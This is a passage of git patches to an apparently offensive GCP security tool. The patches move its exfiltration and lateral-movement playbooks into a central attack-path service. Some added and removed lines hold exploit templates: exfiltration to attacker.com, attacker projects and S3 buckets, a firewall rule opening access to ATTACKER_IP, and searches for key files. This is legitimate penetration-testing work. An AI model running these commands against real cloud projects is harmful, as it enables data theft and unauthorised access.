requireOsLogin", projectID) + + // SA Usage + case "iam.serviceAccounts.actAs": + return fmt.Sprintf("# Required alongside compute/serverless create permissions to attach SA") + + // Network Access + case "iap.tunnelInstances.accessViaIAP": + return fmt.Sprintf("gcloud compute start-iap-tunnel INSTANCE PORT --zone=ZONE --project=%s", projectID) + case "compute.firewalls.create": + return fmt.Sprintf("gcloud compute firewall-rules create allow-attacker --network=default --allow=tcp:22,tcp:3389 --source-ranges=ATTACKER_IP/32 --project=%s", projectID) + default: - return fmt.Sprintf("# %s - refer to GCP documentation", permission) + return fmt.Sprintf("# %s - refer to GCP documentation for exploitation", permission) } } From 72a551b38b5b8dfe2d8e4eecc13140ea2d60c785 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Fri, 30 Jan 2026 10:53:15 -0500 Subject: [PATCH 33/48] centralized attackpath service and playbooks --- gcp/commands/dataexfiltration.go | 552 +++----- gcp/commands/lateralmovement.go | 851 +++--------- gcp/commands/privesc.go | 477 +------ gcp/commands/whoami.go | 262 +--- .../attackpathService/attackpathService.go | 1183 ++++++++++++++++- 5 files changed, 1626 insertions(+), 1699 deletions(-) diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go index b7bf869c..94f8c843 100644 --- a/gcp/commands/dataexfiltration.go +++ b/gcp/commands/dataexfiltration.go @@ -121,17 +121,7 @@ type MissingHardening struct { Recommendation string // How to enable it } -// PermissionBasedExfilPath represents an exfiltration capability based on IAM permissions -type PermissionBasedExfilPath struct { - Principal string // Who has this capability - PrincipalType string // user, serviceAccount, group - ProjectID string // Project where permission exists - Permission string // The dangerous permission - Category string // Category of exfiltration - RiskLevel string // CRITICAL, HIGH, MEDIUM - Description string // What this enables - ExploitCommand string // Command to exploit -} +// PermissionBasedExfilPath is replaced by attackpathservice.AttackPath for centralized handling // ------------------------------ // Module Struct @@ -139,14 +129,14 @@ type PermissionBasedExfilPath struct { type DataExfiltrationModule struct { gcpinternal.BaseGCPModule - ProjectExfiltrationPaths map[string][]ExfiltrationPath // projectID -> paths - ProjectPotentialVectors map[string][]PotentialVector // projectID -> vectors - ProjectPublicExports map[string][]PublicExport // projectID -> exports - ProjectPermissionBasedExfil map[string][]PermissionBasedExfilPath // projectID -> permission-based paths - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - mu sync.Mutex - vpcscProtectedProj map[string]bool // Projects protected by VPC-SC - orgPolicyProtection map[string]*OrgPolicyProtection // Org policy protections per project + ProjectExfiltrationPaths map[string][]ExfiltrationPath // projectID -> paths + ProjectPotentialVectors map[string][]PotentialVector // projectID -> vectors + ProjectPublicExports map[string][]PublicExport // projectID -> exports + ProjectAttackPaths map[string][]attackpathservice.AttackPath // projectID -> permission-based attack paths + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex + vpcscProtectedProj map[string]bool // Projects protected by VPC-SC + orgPolicyProtection map[string]*OrgPolicyProtection // Org policy protections per project } // ------------------------------ @@ -170,14 +160,14 @@ func runGCPDataExfiltrationCommand(cmd *cobra.Command, args []string) { } module := &DataExfiltrationModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - ProjectExfiltrationPaths: make(map[string][]ExfiltrationPath), - ProjectPotentialVectors: make(map[string][]PotentialVector), - ProjectPublicExports: make(map[string][]PublicExport), - ProjectPermissionBasedExfil: make(map[string][]PermissionBasedExfilPath), - LootMap: make(map[string]map[string]*internal.LootFile), - vpcscProtectedProj: make(map[string]bool), - orgPolicyProtection: make(map[string]*OrgPolicyProtection), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectExfiltrationPaths: make(map[string][]ExfiltrationPath), + ProjectPotentialVectors: make(map[string][]PotentialVector), + ProjectPublicExports: make(map[string][]PublicExport), + ProjectAttackPaths: make(map[string][]attackpathservice.AttackPath), + LootMap: make(map[string]map[string]*internal.LootFile), + vpcscProtectedProj: make(map[string]bool), + orgPolicyProtection: make(map[string]*OrgPolicyProtection), } module.Execute(cmdCtx.Ctx, cmdCtx.Logger) @@ -210,9 +200,9 @@ func (m *DataExfiltrationModule) getAllPublicExports() []PublicExport { return all } -func (m *DataExfiltrationModule) getAllPermissionBasedExfil() []PermissionBasedExfilPath { - var all []PermissionBasedExfilPath - for _, paths := range m.ProjectPermissionBasedExfil { +func (m *DataExfiltrationModule) getAllAttackPaths() []attackpathservice.AttackPath { + var all []attackpathservice.AttackPath + for _, paths := range m.ProjectAttackPaths { all = append(all, paths...) } return all @@ -238,7 +228,7 @@ func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Lo allPaths := m.getAllExfiltrationPaths() allVectors := m.getAllPotentialVectors() - allPermBasedPaths := m.getAllPermissionBasedExfil() + allPermBasedPaths := m.getAllAttackPaths() // Check results hasResults := len(allPaths) > 0 || len(allVectors) > 0 || len(hardeningRecs) > 0 || len(allPermBasedPaths) > 0 @@ -276,26 +266,20 @@ func (m *DataExfiltrationModule) analyzeOrgFolderExfilPaths(ctx context.Context, } } else if len(orgPaths) > 0 { logger.InfoM(fmt.Sprintf("Found %d organization-level exfil path(s)", len(orgPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) - for _, path := range orgPaths { - orgName := orgNames[path.ScopeID] + for i := range orgPaths { + orgName := orgNames[orgPaths[i].ScopeID] if orgName == "" { - orgName = path.ScopeID - } - exfilPath := PermissionBasedExfilPath{ - Principal: path.Principal, - PrincipalType: path.PrincipalType, - ProjectID: "org:" + path.ScopeID, - Permission: path.Method, - Category: path.Category + " (Org: " + orgName + ")", - RiskLevel: "CRITICAL", // Org-level is critical - Description: path.Description, - ExploitCommand: path.ExploitCommand, + orgName = orgPaths[i].ScopeID } - // Store under a special "organization" key - m.mu.Lock() - m.ProjectPermissionBasedExfil["organization"] = append(m.ProjectPermissionBasedExfil["organization"], exfilPath) - m.mu.Unlock() + // Update the path with org context + orgPaths[i].ScopeName = orgName + orgPaths[i].RiskLevel = "CRITICAL" // Org-level is critical + orgPaths[i].PathType = "exfil" } + // Store under a special "organization" key + m.mu.Lock() + m.ProjectAttackPaths["organization"] = append(m.ProjectAttackPaths["organization"], orgPaths...) + m.mu.Unlock() } // Analyze folder-level IAM @@ -306,26 +290,20 @@ func (m *DataExfiltrationModule) analyzeOrgFolderExfilPaths(ctx context.Context, } } else if len(folderPaths) > 0 { logger.InfoM(fmt.Sprintf("Found %d folder-level exfil path(s)", len(folderPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) - for _, path := range folderPaths { - folderName := folderNames[path.ScopeID] + for i := range folderPaths { + folderName := folderNames[folderPaths[i].ScopeID] if folderName == "" { - folderName = path.ScopeID + folderName = folderPaths[i].ScopeID } - exfilPath := PermissionBasedExfilPath{ - Principal: path.Principal, - PrincipalType: path.PrincipalType, - ProjectID: "folder:" + path.ScopeID, - Permission: path.Method, - Category: path.Category + " (Folder: " + folderName + ")", - RiskLevel: "CRITICAL", // Folder-level is critical - Description: path.Description, - ExploitCommand: path.ExploitCommand, - } - // Store under a special "folder" key - m.mu.Lock() - m.ProjectPermissionBasedExfil["folder"] = append(m.ProjectPermissionBasedExfil["folder"], exfilPath) - m.mu.Unlock() + // Update the path with folder context + folderPaths[i].ScopeName = folderName + folderPaths[i].RiskLevel = "CRITICAL" // Folder-level is critical + folderPaths[i].PathType = "exfil" } + // Store under a special "folder" key + m.mu.Lock() + m.ProjectAttackPaths["folder"] = append(m.ProjectAttackPaths["folder"], folderPaths...) + m.mu.Unlock() } } @@ -676,268 +654,145 @@ func (m *DataExfiltrationModule) initializeLootForProject(projectID string) { } func (m *DataExfiltrationModule) generatePlaybook() *internal.LootFile { - return &internal.LootFile{ - Name: "data-exfiltration-playbook", - Contents: `# GCP Data Exfiltration Playbook -# Generated by CloudFox -# -# This playbook provides exploitation techniques for identified data exfiltration paths. + // Convert all findings to AttackPath format for centralized playbook generation + allAttackPaths := m.collectAllAttackPaths() -` + m.generatePlaybookSections(), + return &internal.LootFile{ + Name: "data-exfiltration-playbook", + Contents: attackpathservice.GenerateExfilPlaybook(allAttackPaths, ""), } } -func (m *DataExfiltrationModule) generatePlaybookSections() string { - var sections strings.Builder +// collectAllAttackPaths converts ExfiltrationPath, PotentialVector, and PublicExport to AttackPath +func (m *DataExfiltrationModule) collectAllAttackPaths() []attackpathservice.AttackPath { + var allPaths []attackpathservice.AttackPath - allPaths := m.getAllExfiltrationPaths() - allVectors := m.getAllPotentialVectors() - allExports := m.getAllPublicExports() - allPermPaths := m.getAllPermissionBasedExfil() - - // Group by path type - publicSnapshots := []ExfiltrationPath{} - publicImages := []ExfiltrationPath{} - publicBuckets := []ExfiltrationPath{} - loggingSinks := []ExfiltrationPath{} - pubsubPaths := []ExfiltrationPath{} - bqPaths := []ExfiltrationPath{} - sqlPaths := []ExfiltrationPath{} - transferPaths := []ExfiltrationPath{} - - for _, p := range allPaths { - switch { - case strings.Contains(p.PathType, "Snapshot"): - publicSnapshots = append(publicSnapshots, p) - case strings.Contains(p.PathType, "Image"): - publicImages = append(publicImages, p) - case strings.Contains(p.PathType, "Bucket") || strings.Contains(p.PathType, "Storage"): - publicBuckets = append(publicBuckets, p) - case strings.Contains(p.PathType, "Logging"): - loggingSinks = append(loggingSinks, p) - case strings.Contains(p.PathType, "Pub/Sub") || strings.Contains(p.PathType, "PubSub"): - pubsubPaths = append(pubsubPaths, p) - case strings.Contains(p.PathType, "BigQuery"): - bqPaths = append(bqPaths, p) - case strings.Contains(p.PathType, "SQL"): - sqlPaths = append(sqlPaths, p) - case strings.Contains(p.PathType, "Transfer"): - transferPaths = append(transferPaths, p) + // Convert ExfiltrationPaths (actual misconfigurations) + for _, paths := range m.ProjectExfiltrationPaths { + for _, p := range paths { + allPaths = append(allPaths, m.exfiltrationPathToAttackPath(p)) } } - // Public Snapshots - if len(publicSnapshots) > 0 { - sections.WriteString("## Public Compute Snapshots\n\n") - sections.WriteString("These snapshots are publicly accessible and can be used to create disks in attacker-controlled projects.\n\n") - sections.WriteString("### Vulnerable Snapshots:\n") - for _, p := range publicSnapshots { - sections.WriteString(fmt.Sprintf("- %s in %s\n", p.ResourceName, p.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create disk from public snapshot in attacker project\n") - sections.WriteString("gcloud compute disks create exfil-disk \\\n") - sections.WriteString(" --source-snapshot=projects/VICTIM_PROJECT/global/snapshots/SNAPSHOT_NAME \\\n") - sections.WriteString(" --zone=us-central1-a \\\n") - sections.WriteString(" --project=ATTACKER_PROJECT\n\n") - sections.WriteString("# Attach disk to instance\n") - sections.WriteString("gcloud compute instances attach-disk INSTANCE \\\n") - sections.WriteString(" --disk=exfil-disk --zone=us-central1-a\n\n") - sections.WriteString("# Mount and access data\n") - sections.WriteString("sudo mkdir /mnt/exfil && sudo mount /dev/sdb1 /mnt/exfil\n") - sections.WriteString("```\n\n") - } - - // Public Images - if len(publicImages) > 0 { - sections.WriteString("## Public Compute Images\n\n") - sections.WriteString("These images are publicly accessible and may contain sensitive data or credentials.\n\n") - sections.WriteString("### Vulnerable Images:\n") - for _, p := range publicImages { - sections.WriteString(fmt.Sprintf("- %s in %s\n", p.ResourceName, p.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create instance from public image in attacker project\n") - sections.WriteString("gcloud compute instances create exfil-vm \\\n") - sections.WriteString(" --image=projects/VICTIM_PROJECT/global/images/IMAGE_NAME \\\n") - sections.WriteString(" --zone=us-central1-a \\\n") - sections.WriteString(" --project=ATTACKER_PROJECT\n\n") - sections.WriteString("# Access the instance and search for credentials\n") - sections.WriteString("gcloud compute ssh exfil-vm --zone=us-central1-a\n") - sections.WriteString("find / -name '*.pem' -o -name '*.key' -o -name 'credentials*' 2>/dev/null\n") - sections.WriteString("```\n\n") - } - - // Public Buckets - if len(publicBuckets) > 0 || len(allExports) > 0 { - sections.WriteString("## Public Storage Buckets\n\n") - sections.WriteString("These buckets are publicly accessible.\n\n") - sections.WriteString("### Vulnerable Buckets:\n") - for _, p := range publicBuckets { - sections.WriteString(fmt.Sprintf("- %s in %s\n", p.ResourceName, p.ProjectID)) - } - for _, e := range allExports { - if e.ResourceType == "bucket" { - sections.WriteString(fmt.Sprintf("- %s in %s (%s)\n", e.ResourceName, e.ProjectID, e.AccessLevel)) - } - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# List bucket contents\n") - sections.WriteString("gsutil ls -r gs://BUCKET_NAME/\n\n") - sections.WriteString("# Download all data\n") - sections.WriteString("gsutil -m cp -r gs://BUCKET_NAME/ ./exfil/\n\n") - sections.WriteString("# Search for sensitive files\n") - sections.WriteString("gsutil ls -r gs://BUCKET_NAME/ | grep -E '\\.(pem|key|json|env|config)$'\n") - sections.WriteString("```\n\n") - } - - // Logging Sinks - if len(loggingSinks) > 0 { - sections.WriteString("## Cross-Project Logging Sinks\n\n") - sections.WriteString("These logging sinks export logs to external destinations.\n\n") - sections.WriteString("### Identified Sinks:\n") - for _, p := range loggingSinks { - sections.WriteString(fmt.Sprintf("- %s -> %s\n", p.ResourceName, p.Destination)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create logging sink to attacker-controlled destination\n") - sections.WriteString("gcloud logging sinks create exfil-sink \\\n") - sections.WriteString(" pubsub.googleapis.com/projects/ATTACKER_PROJECT/topics/exfil-logs \\\n") - sections.WriteString(" --log-filter='resource.type=\"gce_instance\"'\n\n") - sections.WriteString("# Export all audit logs\n") - sections.WriteString("gcloud logging sinks create audit-exfil \\\n") - sections.WriteString(" storage.googleapis.com/ATTACKER_BUCKET \\\n") - sections.WriteString(" --log-filter='protoPayload.@type=\"type.googleapis.com/google.cloud.audit.AuditLog\"'\n") - sections.WriteString("```\n\n") - } - - // Pub/Sub - if len(pubsubPaths) > 0 { - sections.WriteString("## Pub/Sub Exfiltration Paths\n\n") - sections.WriteString("These Pub/Sub configurations enable data exfiltration.\n\n") - sections.WriteString("### Identified Paths:\n") - for _, p := range pubsubPaths { - sections.WriteString(fmt.Sprintf("- %s -> %s\n", p.ResourceName, p.Destination)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create push subscription to attacker endpoint\n") - sections.WriteString("gcloud pubsub subscriptions create exfil-sub \\\n") - sections.WriteString(" --topic=TOPIC_NAME \\\n") - sections.WriteString(" --push-endpoint=https://attacker.com/receive\n\n") - sections.WriteString("# Or create pull subscription and export\n") - sections.WriteString("gcloud pubsub subscriptions create exfil-pull --topic=TOPIC_NAME\n") - sections.WriteString("gcloud pubsub subscriptions pull exfil-pull --limit=1000 --auto-ack\n") - sections.WriteString("```\n\n") - } - - // BigQuery - if len(bqPaths) > 0 { - sections.WriteString("## BigQuery Data Exfiltration\n\n") - sections.WriteString("These BigQuery configurations enable data exfiltration.\n\n") - sections.WriteString("### Identified Paths:\n") - for _, p := range bqPaths { - sections.WriteString(fmt.Sprintf("- %s in %s\n", p.ResourceName, p.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Export table to GCS bucket (requires storage.objects.create)\n") - sections.WriteString("bq extract \\\n") - sections.WriteString(" --destination_format=NEWLINE_DELIMITED_JSON \\\n") - sections.WriteString(" 'PROJECT:DATASET.TABLE' \\\n") - sections.WriteString(" gs://ATTACKER_BUCKET/exfil/data-*.json\n\n") - sections.WriteString("# Query and save locally\n") - sections.WriteString("bq query --format=json 'SELECT * FROM PROJECT.DATASET.TABLE' > exfil.json\n\n") - sections.WriteString("# Copy dataset to attacker project\n") - sections.WriteString("bq cp PROJECT:DATASET.TABLE ATTACKER_PROJECT:EXFIL_DATASET.TABLE\n") - sections.WriteString("```\n\n") - } - - // Cloud SQL - if len(sqlPaths) > 0 { - sections.WriteString("## Cloud SQL Data Exfiltration\n\n") - sections.WriteString("These Cloud SQL instances have export capabilities.\n\n") - sections.WriteString("### Identified Instances:\n") - for _, p := range sqlPaths { - sections.WriteString(fmt.Sprintf("- %s in %s\n", p.ResourceName, p.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Export database to GCS\n") - sections.WriteString("gcloud sql export sql INSTANCE_NAME \\\n") - sections.WriteString(" gs://ATTACKER_BUCKET/exfil/dump.sql \\\n") - sections.WriteString(" --database=DATABASE_NAME\n\n") - sections.WriteString("# Export as CSV\n") - sections.WriteString("gcloud sql export csv INSTANCE_NAME \\\n") - sections.WriteString(" gs://ATTACKER_BUCKET/exfil/data.csv \\\n") - sections.WriteString(" --database=DATABASE_NAME \\\n") - sections.WriteString(" --query='SELECT * FROM sensitive_table'\n") - sections.WriteString("```\n\n") - } - - // Storage Transfer - if len(transferPaths) > 0 { - sections.WriteString("## Storage Transfer Service Exfiltration\n\n") - sections.WriteString("These storage transfer jobs export data to external destinations.\n\n") - sections.WriteString("### Identified Jobs:\n") - for _, p := range transferPaths { - sections.WriteString(fmt.Sprintf("- %s -> %s\n", p.ResourceName, p.Destination)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create transfer job to external AWS S3\n") - sections.WriteString("gcloud transfer jobs create \\\n") - sections.WriteString(" gs://SOURCE_BUCKET \\\n") - sections.WriteString(" s3://attacker-bucket \\\n") - sections.WriteString(" --source-creds-file=gcs-creds.json\n") - sections.WriteString("```\n\n") - } - - // Permission-based exfil - if len(allPermPaths) > 0 { - sections.WriteString("## Permission-Based Exfiltration Capabilities\n\n") - sections.WriteString("These principals have permissions that enable data exfiltration.\n\n") - - // Group by category - categoryPaths := make(map[string][]PermissionBasedExfilPath) - for _, p := range allPermPaths { - categoryPaths[p.Category] = append(categoryPaths[p.Category], p) + // Convert PotentialVectors + for _, vectors := range m.ProjectPotentialVectors { + for _, v := range vectors { + allPaths = append(allPaths, m.potentialVectorToAttackPath(v)) } + } - for category, paths := range categoryPaths { - sections.WriteString(fmt.Sprintf("### %s\n", category)) - for _, p := range paths { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", p.Principal, p.PrincipalType, p.Permission)) - } - sections.WriteString("\n") + // Convert PublicExports (bucket specific public exports) + for _, exports := range m.ProjectPublicExports { + for _, e := range exports { + allPaths = append(allPaths, m.publicExportToAttackPath(e)) } } - // Potential Vectors - if len(allVectors) > 0 { - sections.WriteString("## Potential Exfiltration Vectors\n\n") - sections.WriteString("These resources could be used for data exfiltration if compromised.\n\n") + // Include permission-based attack paths (already in AttackPath format) + for _, paths := range m.ProjectAttackPaths { + allPaths = append(allPaths, paths...) + } - // Group by vector type - vectorTypes := make(map[string][]PotentialVector) - for _, v := range allVectors { - vectorTypes[v.VectorType] = append(vectorTypes[v.VectorType], v) - } + return allPaths +} - for vType, vectors := range vectorTypes { - sections.WriteString(fmt.Sprintf("### %s\n", vType)) - for _, v := range vectors { - sections.WriteString(fmt.Sprintf("- %s in %s\n", v.ResourceName, v.ProjectID)) - } - sections.WriteString("\n") - } +// exfiltrationPathToAttackPath converts ExfiltrationPath to AttackPath with correct category mapping +func (m *DataExfiltrationModule) exfiltrationPathToAttackPath(p ExfiltrationPath) attackpathservice.AttackPath { + // Map PathType to centralized category + category := mapExfilPathTypeToCategory(p.PathType) + + return attackpathservice.AttackPath{ + PathType: "exfil", + Category: category, + Method: p.PathType, + Principal: "N/A (Misconfiguration)", + PrincipalType: "resource", + TargetResource: p.ResourceName, + ProjectID: p.ProjectID, + ScopeType: "project", + ScopeID: p.ProjectID, + ScopeName: p.ProjectID, + Description: p.Destination, + Permissions: []string{}, + ExploitCommand: p.ExploitCommand, + } +} + +// potentialVectorToAttackPath converts PotentialVector to AttackPath +func (m *DataExfiltrationModule) potentialVectorToAttackPath(v PotentialVector) attackpathservice.AttackPath { + return attackpathservice.AttackPath{ + PathType: "exfil", + Category: "Potential Vector", + Method: v.VectorType, + Principal: "N/A (Potential)", + PrincipalType: "resource", + TargetResource: v.ResourceName, + ProjectID: v.ProjectID, + ScopeType: "project", + ScopeID: v.ProjectID, + ScopeName: v.ProjectID, + Description: v.Destination, + Permissions: []string{}, + ExploitCommand: v.ExploitCommand, } +} + +// publicExportToAttackPath converts PublicExport to AttackPath +func (m *DataExfiltrationModule) publicExportToAttackPath(e PublicExport) attackpathservice.AttackPath { + category := "Public Bucket" + if e.ResourceType == "snapshot" { + category = "Public Snapshot" + } else if e.ResourceType == "image" { + category = "Public Image" + } else if e.ResourceType == "dataset" { + category = "Public BigQuery" + } + + return attackpathservice.AttackPath{ + PathType: "exfil", + Category: category, + Method: e.ResourceType + " (" + e.AccessLevel + ")", + Principal: e.AccessLevel, + PrincipalType: "public", + TargetResource: e.ResourceName, + ProjectID: e.ProjectID, + ScopeType: "project", + ScopeID: e.ProjectID, + ScopeName: e.ProjectID, + Description: fmt.Sprintf("Public %s with %s access", e.ResourceType, e.AccessLevel), + Permissions: []string{}, + ExploitCommand: "", + } +} - return sections.String() +// mapExfilPathTypeToCategory maps ExfiltrationPath.PathType to centralized categories +func mapExfilPathTypeToCategory(pathType string) string { + switch { + case strings.Contains(pathType, "Snapshot"): + return "Public Snapshot" + case strings.Contains(pathType, "Image"): + return "Public Image" + case strings.Contains(pathType, "Bucket"), strings.Contains(pathType, "Storage"): + return "Public Bucket" + case strings.Contains(pathType, "Logging"): + return "Logging Sink" + case strings.Contains(pathType, "Pub/Sub Push") || strings.Contains(pathType, "PubSub Push"): + return "Pub/Sub Push" + case strings.Contains(pathType, "Pub/Sub BigQuery") || strings.Contains(pathType, "PubSub BigQuery"): + return "Pub/Sub BigQuery Export" + case strings.Contains(pathType, "Pub/Sub GCS") || strings.Contains(pathType, "PubSub GCS"): + return "Pub/Sub GCS Export" + case strings.Contains(pathType, "Pub/Sub") || strings.Contains(pathType, "PubSub"): + return "Pub/Sub Push" // Default Pub/Sub category + case strings.Contains(pathType, "BigQuery"): + return "Public BigQuery" + case strings.Contains(pathType, "SQL"): + return "Cloud SQL Export" + case strings.Contains(pathType, "Transfer"): + return "Storage Transfer Job" + default: + return "Potential Vector" + } } func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { @@ -1800,8 +1655,7 @@ gcloud logging sinks update SINK_NAME \ } // findPermissionBasedExfilPaths identifies principals with data exfiltration permissions -// This now uses the centralized attackpathService for project-level analysis only -// Org/folder/resource level analysis is done separately in findAllLevelExfilPaths +// This uses the centralized attackpathService for project and resource-level analysis func (m *DataExfiltrationModule) findPermissionBasedExfilPaths(ctx context.Context, projectID string, logger internal.Logger) { // Use attackpathService for project-level analysis attackSvc := attackpathservice.New() @@ -1814,23 +1668,10 @@ func (m *DataExfiltrationModule) findPermissionBasedExfilPaths(ctx context.Conte return } - // Convert AttackPath to PermissionBasedExfilPath - for _, path := range paths { - exfilPath := PermissionBasedExfilPath{ - Principal: path.Principal, - PrincipalType: path.PrincipalType, - ProjectID: projectID, - Permission: path.Method, - Category: path.Category, - RiskLevel: "HIGH", // Default risk level - Description: path.Description, - ExploitCommand: path.ExploitCommand, - } - - m.mu.Lock() - m.ProjectPermissionBasedExfil[projectID] = append(m.ProjectPermissionBasedExfil[projectID], exfilPath) - m.mu.Unlock() - } + // Store paths directly (they're already AttackPath type) + m.mu.Lock() + m.ProjectAttackPaths[projectID] = append(m.ProjectAttackPaths[projectID], paths...) + m.mu.Unlock() // Also analyze resource-level IAM resourcePaths, err := attackSvc.AnalyzeResourceAttackPaths(ctx, projectID, "exfil") @@ -1840,56 +1681,9 @@ func (m *DataExfiltrationModule) findPermissionBasedExfilPaths(ctx context.Conte fmt.Sprintf("Could not analyze resource-level exfil permissions for project %s", projectID)) } } else { - for _, path := range resourcePaths { - exfilPath := PermissionBasedExfilPath{ - Principal: path.Principal, - PrincipalType: path.PrincipalType, - ProjectID: projectID, - Permission: path.Method, - Category: path.Category + " (Resource: " + path.ScopeName + ")", - RiskLevel: "HIGH", - Description: path.Description, - ExploitCommand: path.ExploitCommand, - } - - m.mu.Lock() - m.ProjectPermissionBasedExfil[projectID] = append(m.ProjectPermissionBasedExfil[projectID], exfilPath) - m.mu.Unlock() - } - } -} - -// generateExfilExploitCommand generates an exploit command for a data exfil permission -func (m *DataExfiltrationModule) generateExfilExploitCommand(permission, projectID string) string { - switch permission { - case "compute.images.create": - return fmt.Sprintf(`# Create image from disk (for export) -gcloud compute images create exfil-image --source-disk=DISK_NAME --source-disk-zone=ZONE --project=%s -# Export to external bucket -gcloud compute images export --image=exfil-image --destination-uri=gs://EXTERNAL_BUCKET/image.tar.gz --project=%s`, projectID, projectID) - case "compute.snapshots.create": - return fmt.Sprintf(`# Create snapshot from disk (for export) -gcloud compute snapshots create exfil-snapshot --source-disk=DISK_NAME --source-disk-zone=ZONE --project=%s`, projectID) - case "logging.sinks.create": - return fmt.Sprintf(`# Create logging sink to external destination -gcloud logging sinks create exfil-sink pubsub.googleapis.com/projects/EXTERNAL_PROJECT/topics/stolen-logs --project=%s`, projectID) - case "cloudsql.instances.export": - return fmt.Sprintf(`# Export Cloud SQL database to GCS -gcloud sql export sql INSTANCE_NAME gs://BUCKET/export.sql --database=DB_NAME --project=%s`, projectID) - case "pubsub.subscriptions.create": - return fmt.Sprintf(`# Create subscription to intercept messages -gcloud pubsub subscriptions create exfil-sub --topic=TOPIC_NAME --push-endpoint=https://attacker.com/collect --project=%s`, projectID) - case "bigquery.tables.export": - return fmt.Sprintf(`# Export BigQuery table to GCS -bq extract --destination_format=CSV '%s:DATASET.TABLE' gs://BUCKET/export.csv`, projectID) - case "storagetransfer.jobs.create": - return fmt.Sprintf(`# Create transfer job to external cloud (requires API) -gcloud transfer jobs create gs://SOURCE_BUCKET s3://DEST_BUCKET --project=%s`, projectID) - case "secretmanager.versions.access": - return fmt.Sprintf(`# Access secret values -gcloud secrets versions access latest --secret=SECRET_NAME --project=%s`, projectID) - default: - return fmt.Sprintf("# Permission: %s\n# Refer to GCP documentation for exploitation", permission) + m.mu.Lock() + m.ProjectAttackPaths[projectID] = append(m.ProjectAttackPaths[projectID], resourcePaths...) + m.mu.Unlock() } } diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go index f1a36cc4..4a8707a0 100644 --- a/gcp/commands/lateralmovement.go +++ b/gcp/commands/lateralmovement.go @@ -42,52 +42,17 @@ initial access to a GCP environment.`, Run: runGCPLateralMovementCommand, } -// ------------------------------ -// Data Structures -// ------------------------------ - -type ImpersonationChain struct { - StartIdentity string - TargetSA string - ChainLength int - Path []string // [identity] -> [sa1] -> [sa2] -> ... - RiskLevel string // CRITICAL, HIGH, MEDIUM - ExploitCommand string -} - -type TokenTheftVector struct { - ResourceType string // "instance", "function", "cloudrun", etc. - ResourceName string - ProjectID string - ServiceAccount string - AttackVector string // "metadata", "env_var", "startup_script", etc. - RiskLevel string - ExploitCommand string -} - -// PermissionBasedLateralPath represents a lateral movement capability based on IAM permissions -type PermissionBasedLateralPath struct { - Principal string // Who has this capability - PrincipalType string // user, serviceAccount, group - ProjectID string // Project where permission exists - Permission string // The dangerous permission - Category string // Category of lateral movement - RiskLevel string // CRITICAL, HIGH, MEDIUM - Description string // What this enables - ExploitCommand string // Command to exploit -} - // ------------------------------ // Module Struct // ------------------------------ type LateralMovementModule struct { gcpinternal.BaseGCPModule - ProjectImpersonationChains map[string][]ImpersonationChain // projectID -> chains - ProjectTokenTheftVectors map[string][]TokenTheftVector // projectID -> vectors - ProjectPermissionBasedPaths map[string][]PermissionBasedLateralPath // projectID -> permission-based paths - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - mu sync.Mutex + // All lateral movement paths using centralized AttackPath struct + AllPaths []attackpathservice.AttackPath + ProjectPaths map[string][]attackpathservice.AttackPath // projectID -> paths + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -111,11 +76,10 @@ func runGCPLateralMovementCommand(cmd *cobra.Command, args []string) { } module := &LateralMovementModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - ProjectImpersonationChains: make(map[string][]ImpersonationChain), - ProjectTokenTheftVectors: make(map[string][]TokenTheftVector), - ProjectPermissionBasedPaths: make(map[string][]PermissionBasedLateralPath), - LootMap: make(map[string]map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + AllPaths: []attackpathservice.AttackPath{}, + ProjectPaths: make(map[string][]attackpathservice.AttackPath), + LootMap: make(map[string]map[string]*internal.LootFile), } module.Execute(cmdCtx.Ctx, cmdCtx.Logger) @@ -124,30 +88,6 @@ func runGCPLateralMovementCommand(cmd *cobra.Command, args []string) { // ------------------------------ // Module Execution // ------------------------------ -func (m *LateralMovementModule) getAllImpersonationChains() []ImpersonationChain { - var all []ImpersonationChain - for _, chains := range m.ProjectImpersonationChains { - all = append(all, chains...) - } - return all -} - -func (m *LateralMovementModule) getAllTokenTheftVectors() []TokenTheftVector { - var all []TokenTheftVector - for _, vectors := range m.ProjectTokenTheftVectors { - all = append(all, vectors...) - } - return all -} - -func (m *LateralMovementModule) getAllPermissionBasedPaths() []PermissionBasedLateralPath { - var all []PermissionBasedLateralPath - for _, paths := range m.ProjectPermissionBasedPaths { - all = append(all, paths...) - } - return all -} - func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Mapping lateral movement paths...", GCP_LATERALMOVEMENT_MODULE_NAME) @@ -157,19 +97,24 @@ func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Log // Process each project m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_LATERALMOVEMENT_MODULE_NAME, m.processProject) - allChains := 